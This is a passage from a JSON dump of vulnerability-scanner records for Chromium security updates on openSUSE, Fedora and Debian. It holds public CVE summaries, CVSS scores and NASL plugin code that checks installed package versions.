or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:44:25", "description": "The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 
88.0.4324.182 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. 
(CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 
(CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome Extension. 
(CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted PDF file. 
(CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-03-22T00:00:00", "type": "nessus", "title": "Fedora 32 : chromium (2021-c88a96bd4b)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", 
"cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2021-C88A96BD4B.NASL", "href": "https://www.tenable.com/plugins/nessus/147941", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-c88a96bd4b\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147941);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-21149\",\n \"CVE-2021-21150\",\n \"CVE-2021-21151\",\n \"CVE-2021-21152\",\n \"CVE-2021-21153\",\n \"CVE-2021-21154\",\n \"CVE-2021-21155\",\n \"CVE-2021-21156\",\n \"CVE-2021-21157\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"FEDORA\", value:\"2021-c88a96bd4b\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Fedora 32 : chromium (2021-c88a96bd4b)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in 
the\nFEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who\n had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote\n attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted\n HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. 
(CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. 
(CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 
(CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. 
(CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. 
(CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-c88a96bd4b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21155\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 32', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'chromium-89.0.4389.82-1.fc32', 'release':'FC32', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if 
(!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:27", "description": "Several vulnerabilites have been discovered in the chromium web browser.\n\n - CVE-2021-21159 Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21160 Marcin Noga discovered a buffer overflow issue in WebAudio.\n\n - CVE-2021-21161 Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21162 A use-after-free issue was discovered in the WebRTC implementation.\n\n - CVE-2021-21163 Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165 Alison Huffman discovered an error in the audio implementation.\n\n - CVE-2021-21166 Alison Huffman discovered an error in the audio implementation.\n\n - CVE-2021-21167 Leecraso and Guang Gong discovered a use-after-free issue in the bookmarks implementation.\n\n - CVE-2021-21168 Luan Herrera discovered a policy enforcement error in the appcache.\n\n - CVE-2021-21169 Bohan Liu and Moon Liang discovered an out-of-bounds access issue in the v8 JavaScript library.\n\n - CVE-2021-21170 David Erceg discovered a user interface error.\n\n - CVE-2021-21171 Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172 Maciej Pulikowski discovered a policy enforcement error in the File System API.\n\n - CVE-2021-21173 Tom Van Goethem discovered a network based information 
leak.\n\n - CVE-2021-21174 Ashish Guatam Kambled discovered an implementation error in the Referrer policy.\n\n - CVE-2021-21175 Jun Kokatsu discovered an implementation error in the Site Isolation feature.\n\n - CVE-2021-21176 Luan Herrera discovered an implementation error in the full screen mode.\n\n - CVE-2021-21177 Abdulrahman Alqabandi discovered a policy enforcement error in the Autofill feature.\n\n - CVE-2021-21178 Japong discovered an error in the Compositor implementation.\n\n - CVE-2021-21179 A use-after-free issue was discovered in the networking implementation.\n\n - CVE-2021-21180 Abdulrahman Alqabandi discovered a use-after-free issue in the tab search feature.\n\n - CVE-2021-21181 Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182 Luan Herrera discovered a policy enforcement error in the site navigation implementation.\n\n - CVE-2021-21183 Takashi Yoneuchi discovered an implementation error in the Performance API.\n\n - CVE-2021-21184 James Hartig discovered an implementation error in the Performance API.\n\n - CVE-2021-21185 David Erceg discovered a policy enforcement error in Extensions.\n\n - CVE-2021-21186 dhirajkumarnifty discovered a policy enforcement error in the QR scan implementation.\n\n - CVE-2021-21187 Kirtikumar Anandrao Ramchandani discovered a data validation error in URL formatting.\n\n - CVE-2021-21188 Woojin Oh discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21189 Khalil Zhani discovered a policy enforcement error in the Payments implementation.\n\n - CVE-2021-21190 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21191 raven discovered a use-after-free issue in the WebRTC implementation.\n\n - CVE-2021-21192 Abdulrahman Alqabandi discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21193 A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194 
Leecraso and Guang Gong discovered a use-after-free issue in the screen capture feature.\n\n - CVE-2021-21195 Liu and Liang discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2021-21196 Khalil Zhani discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21197 Abdulrahman Alqabandi discovered a buffer overflow issue in the tab implementation.\n\n - CVE-2021-21198 Mark Brand discovered an out-of-bounds read issue in the Inter-Process Communication implementation.\n\n - CVE-2021-21199 Weipeng Jiang discovered a use-after-free issue in the Aura window and event manager.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "nessus", "title": "Debian DSA-4886-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", 
